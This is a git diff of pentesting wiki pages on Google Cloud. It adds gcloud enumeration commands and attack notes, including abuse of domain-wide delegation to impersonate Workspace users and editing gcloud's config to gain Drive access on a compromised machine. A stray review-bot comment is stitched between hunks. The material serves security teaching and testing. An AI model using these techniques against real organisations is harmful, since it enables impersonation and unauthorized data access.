@@ -59,62 +45,48 @@ gcloud scc notifications list # Get findings (if not premium these are just vulnerabilities) gcloud scc findings list ``` -{% endcode %} ### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-security-post-exploitation.md" %} -[gcp-security-post-exploitation.md](../gcp-post-exploitation/gcp-security-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-security-post-exploitation.md +{{#endref}} ## Detections and Controls -* **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response. -* **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots. -* **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service. -* **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture. -* **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise. -* **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure. -* **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability. -* **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud. 
+- **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response. +- **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots. +- **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service. +- **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture. +- **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise. +- **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure. +- **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability. +- **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud. ## Data Protection -* **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure. -* **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules. 
-* **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services. -* **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in: +- **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure. +- **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules. +- **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services. +- **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in: -{% content-ref url="gcp-kms-enum.md" %} -[gcp-kms-enum.md](gcp-kms-enum.md) -{% endcontent-ref %} +{{#ref}} +gcp-kms-enum.md +{{#endref}} -* **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications. -* **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in: +- **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications. 
+- **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in: -{% content-ref url="gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](gcp-secrets-manager-enum.md) -{% endcontent-ref %} +{{#ref}} +gcp-secrets-manager-enum.md +{{#endref}} ## Zero Trust -* **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access. -* **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies. -* **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates. -* **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control. -* **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more. +- **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access. 
+- **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies. +- **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates. +- **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control. +- **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md new file mode 100644 index 000000000..a578f7e4b --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md 
@@ -0,0 +1,67 @@ +# GCP - Source Repositories Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code. + +Key features of Cloud Source Repositories include: + +1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows. +2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment. +3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles. +4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices. +5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews. +6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories. + +### OffSec information + +- The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background. 
+- To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**. +- You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms). +- It's possible to **code & debug from inside GCP**. +- By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled. + +### Open In Cloud Shell + +It's possible to open the repository in Cloud Shell, a prompt like this one will appear: + +
+ +This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised). + +### Enumeration + +```bash +# Repos enumeration +gcloud source repos list #Get names and URLs +gcloud source repos describe +gcloud source repos get-iam-policy + +# gcloud repo clone +gcloud source repos clone +gcloud source repos get-iam-policy +... git add & git commit -m ... +git push --set-upstream origin master +git push -u origin master + +# Access via git +## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command) +git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ +git add, commit, push... +``` + +### Privilege Escalation & Post Exploitation + +{{#ref}} +../gcp-privilege-escalation/gcp-sourcerepos-privesc.md +{{#endref}} + +### Unauthenticated Enum + +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md new file mode 100644 index 000000000..671c876da --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md 
@@ -0,0 +1,31 @@
+# GCP - Spanner Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
+
+Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
+
+```bash
+# Cloud Spanner
+## Instances
+gcloud spanner instances list
+gcloud spanner instances describe
+gcloud spanner instances get-iam-policy
+
+## Databases
+gcloud spanner databases list --instance
+gcloud spanner databases describe --instance
+gcloud spanner databases get-iam-policy --instance
+gcloud spanner databases execute-sql --instance --sql
+
+## Backups
+gcloud spanner backups list --instance
+gcloud spanner backups get-iam-policy --instance
+
+## Instance Configs
+gcloud spanner instance-configs list
+gcloud spanner instance-configs describe
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
new file mode 100644
index 000000000..f1ce0c957
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
@@ -0,0 +1,33 @@
+# GCP - Stackdriver Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
+
+[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
+
+For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
+
+To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
+
+```bash
+# List logs
+gcloud logging logs list
+
+# Read logs
+gcloud logging read [FOLDER]
+
+# Write logs
+# An attacker writing logs may confuse the Blue Team
+gcloud logging write [FOLDER] [MESSAGE]
+
+# List Buckets
+gcloud logging buckets list
+```
+
+## References
+
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+- [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
+
+{{#include ../../../banners/hacktricks-training.md}}
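Review bot: The `[FOLDER]` placeholder in the logging commands is misleading: `gcloud logging read` takes an optional log filter, not a folder, and `gcloud logging write` expects a log name followed by the message string. I would change the two lines to `gcloud logging read [LOG_FILTER]` and `gcloud logging write LOG_NAME STRING`, with a comment above the read such as `# e.g. 'logName="projects/PROJECT_ID/logs/LOG_ID"'` so readers know what a filter looks like. The prose says the service account needs **READ** and **WRITE** "permissions"; naming the IAM roles involved (the Logs Viewer / Logs Writer pair) would make the enumeration precondition concrete, if the author can confirm them.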
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md similarity index 61% rename from pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md index 03e35e3e8..c3c590471 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md @@ -1,19 +1,6 @@ # GCP - Storage Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Storage 
@@ -23,11 +10,11 @@ The bucket can be stored in a region, in 2 regions or **multi-region (default)** ### Storage Types -* **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines. -* **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes. -* **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.** -* **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons. -* **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**. +- **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines. +- **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. 
It is ideal for backup and archival purposes. +- **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.** +- **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons. +- **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**. ### Access Control 
@@ -64,12 +51,13 @@ An HMAC key is a type of _credential_ and can be **associated with a service acc HMAC keys have two primary pieces, an _access ID_ and a _secret_. -* **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID: +- **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID: - `GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA` -* **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret: + `GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA` - `bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ` +- **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret: + + `bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ` Both the **access ID and secret uniquely identify an HMAC key**, but the secret is much more sensitive information, because it's used to **create signatures**. 
@@ -143,39 +131,26 @@ list_bucket_objects('') In the following page you can check how to **abuse storage permissions to escalate privileges**: -{% content-ref url="../gcp-privilege-escalation/gcp-storage-privesc.md" %} -[gcp-storage-privesc.md](../gcp-privilege-escalation/gcp-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-storage-privesc.md +{{#endref}} ### Unauthenticated Enum -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/" %} -[gcp-storage-unauthenticated-enum](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/) -{% endcontent-ref %} +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/ +{{#endref}} ### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %} -[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-storage-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../gcp-persistence/gcp-storage-persistence.md" %} -[gcp-storage-persistence.md](../gcp-persistence/gcp-storage-persistence.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-storage-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
new file mode 100644
index 000000000..1492b3cb3
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
@@ -0,0 +1,38 @@
+# GCP - Workflows Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
+
+### Encryption
+
+Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
+
+## Enumeration
+
+> [!CAUTION]
+> You can also check the output of previous executions to look for sensitive information
+
+```bash
+# List Workflows
+gcloud workflows list
+
+# Get info and yaml of an specific workflow
+gcloud workflows describe
+
+# List executions
+gcloud workflows executions list workflow-1
+
+# Get execution info and output
+gcloud workflows executions describe projects//locations//workflows//executions/
+```
+
+### Privesc and Post Exploitation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-workflows-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md similarity index 68% rename from pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md rename to src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md index c6354c263..9358b40c2 100644 --- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md @@ -1,19 +1,6 @@ # GCP <--> Workspace Pivoting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## **From GCP to GWS** 
@@ -21,25 +8,23 @@ Learn & practice GCP Hacking: [!NOTE] +> This basically means that **service accounts** inside GCP projects of an organization might be able to i**mpersonate Workspace users** of the same organization (or even from a different one). For more information about how this exactly works check: -{% content-ref url="gcp-understanding-domain-wide-delegation.md" %} -[gcp-understanding-domain-wide-delegation.md](gcp-understanding-domain-wide-delegation.md) -{% endcontent-ref %} +{{#ref}} +gcp-understanding-domain-wide-delegation.md +{{#endref}} ### Compromise existing delegation If an attacker **compromised some access over GCP** and **known a valid Workspace user email** (preferably **super admin**) of the company, he could **enumerate all the projects** he has access to, **enumerate all the SAs** of the projects, check to which **service accounts he has access to**, and **repeat** all these steps with each SA he can impersonate.\ With a **list of all the service accounts** he has **access** to and the list of **Workspace** **emails**, the attacker could try to **impersonate user with each service account**. -{% hint style="danger" %} -Note that when configuring the domain wide delegation no Workspace user is needed, therefore just know **one valid one is enough and required for the impersonation**.\ -However, the **privileges of the impersonated user will be used**, so if it's Super Admin you will be able to access everything. If it doesn't have any access this will be useless. -{% endhint %} +> [!CAUTION] +> Note that when configuring the domain wide delegation no Workspace user is needed, therefore just know **one valid one is enough and required for the impersonation**.\ +> However, the **privileges of the impersonated user will be used**, so if it's Super Admin you will be able to access everything. If it doesn't have any access this will be useless. #### [GCP Generate Delegation Token](https://github.com/carlospolop/gcp_gen_delegation_token) 
@@ -61,7 +46,7 @@ This is a tool that can perform the attack following these steps: 2. Iterate on each project resource, and **enumerate GCP Service account resources** to which the initial IAM user has access using _GetIAMPolicy_. 3. Iterate on **each service account role**, and find built-in, basic, and custom roles with _**serviceAccountKeys.create**_ permission on the target service account resource. It should be noted that the Editor role inherently possesses this permission. 4. Create a **new `KEY_ALG_RSA_2048`** private key to each service account resource which is found with relevant permission in the IAM policy. -5. Iterate on **each new service account and create a `JWT`** **object** for it which is composed of the SA private key credentials and an OAuth scope. The process of creating a new _JWT_ object will **iterate on all the existing combinations of OAuth scopes** from **oauth\_scopes.txt** list, in order to find all the delegation possibilities. The list **oauth\_scopes.txt** is updated with all of the OAuth scopes we’ve found to be relevant for abusing Workspace identities. +5. Iterate on **each new service account and create a `JWT`** **object** for it which is composed of the SA private key credentials and an OAuth scope. The process of creating a new _JWT_ object will **iterate on all the existing combinations of OAuth scopes** from **oauth_scopes.txt** list, in order to find all the delegation possibilities. The list **oauth_scopes.txt** is updated with all of the OAuth scopes we’ve found to be relevant for abusing Workspace identities. 6. The `_make_authorization_grant_assertion` method reveals the necessity to declare a t**arget workspace user**, referred to as _subject_, for generating JWTs under DWD. While this may seem to require a specific user, it's important to realize that **DWD influences every identity within a domain**. 
Consequently, creating a JWT for **any domain user** affects all identities in that domain, consistent with our combination enumeration check. Simply put, one valid Workspace user is adequate to move forward.\ This user can be defined in DeleFriend’s _config.yaml_ file. If a target workspace user is not already known, the tool facilitates the automatic identification of valid workspace users by scanning domain users with roles on GCP projects. It's key to note (again) that JWTs are domain-specific and not generated for every user; hence, the automatic process targets a single unique identity per domain. 7. **Enumerate and create a new bearer access token** for each JWT and validate the token against tokeninfo API. 
@@ -100,11 +85,11 @@ An attacker with the ability to **create service accounts in a GCP project** and 1. **Generating a New Service Account and Corresponding Key Pair:** On GCP, new service account resources can be produced either interactively via the console or programmatically using direct API calls and CLI tools. This requires the **role `iam.serviceAccountAdmin`** or any custom role equipped with the **`iam.serviceAccounts.create`** **permission**. Once the service account is created, we'll proceed to generate a **related key pair** (**`iam.serviceAccountKeys.create`** permission). 2. **Creation of new delegation**: It's important to understand that **only the Super Admin role possesses the capability to set up global Domain-Wide delegation in Google Workspace** and Domain-Wide delegation **cannot be set up programmatically,** It can only be created and adjusted **manually** through the Google Workspace **console**. - * The creation of the rule can be found under the page **API controls → Manage Domain-Wide delegation in Google Workspace Admin console**. + - The creation of the rule can be found under the page **API controls → Manage Domain-Wide delegation in Google Workspace Admin console**. 3. **Attaching OAuth scopes privilege**: When configuring a new delegation, Google requires only 2 parameters, the Client ID, which is the **OAuth ID of the GCP Service Account** resource, and **OAuth scopes** that define what API calls the delegation requires. 
- * The **full list of OAuth scopes** can be found [**here**](https://developers.google.com/identity/protocols/oauth2/scopes), but here is a recommendation: `https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid` + - The **full list of OAuth scopes** can be found [**here**](https://developers.google.com/identity/protocols/oauth2/scopes), but here is a recommendation: `https://www.googleapis.com/auth/userinfo.email, https://www.googleapis.com/auth/cloud-platform, https://www.googleapis.com/auth/admin.directory.group, https://www.googleapis.com/auth/admin.directory.user, https://www.googleapis.com/auth/admin.directory.domain, https://mail.google.com/, https://www.googleapis.com/auth/drive, openid` 4. **Acting on behalf of the target identity:** At this point, we have a functioning delegated object in GWS. Now, **using the GCP Service Account private key, we can perform API calls** (in the scope defined in the OAuth scope parameter) to trigger it and **act on behalf of any identity that exists in Google Workspace**. As we learned, the service account will generate access tokens per its needs and according to the permission he has to REST API applications. - * Check the **previous section** for some **tools** to use this delegation. + - Check the **previous section** for some **tools** to use this delegation. #### Cross-Organizational delegation 
@@ -116,11 +101,9 @@ By **default** Workspace **users** have the permission to **create new projects* Therefore, a user can **create a project**, **enable** the **APIs** to enumerate Workspace in his new project and try to **enumerate** it. -{% hint style="danger" %} -In order for a user to be able to enumerate Workspace he also needs enough Workspace permissions (not every user will be able to enumerate the directory). -{% endhint %} +> [!CAUTION] +> In order for a user to be able to enumerate Workspace he also needs enough Workspace permissions (not every user will be able to enumerate the directory). -{% code overflow="wrap" %} ```bash # Create project gcloud projects create --name=proj-name @@ -138,21 +121,20 @@ gcloud identity groups memberships list --group-email=g # FROM HERE THE USER NEEDS TO HAVE ENOUGH WORKSPACE ACCESS gcloud beta identity groups preview --customer ``` -{% endcode %} Check **more enumeration in**: -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} ### Abusing Gcloud credentials You can find further information about the `gcloud` flow to login in: -{% content-ref url="../gcp-persistence/gcp-non-svc-persistance.md" %} -[gcp-non-svc-persistance.md](../gcp-persistence/gcp-non-svc-persistance.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-non-svc-persistance.md +{{#endref}} As explained there, gcloud can request the scope **`https://www.googleapis.com/auth/drive`** which would allow a user to access the drive of the user.\ As an attacker, if you have compromised **physically** the computer of a user and the **user is still logged** with his account you could login generating a token with access to drive using: 
@@ -163,13 +145,12 @@ gcloud auth login --enable-gdrive-access If an attacker compromises the computer of a user he could also modify the file `google-cloud-sdk/lib/googlecloudsdk/core/config.py` and add in the **`CLOUDSDK_SCOPES`** the scope **`'https://www.googleapis.com/auth/drive'`**: -
+
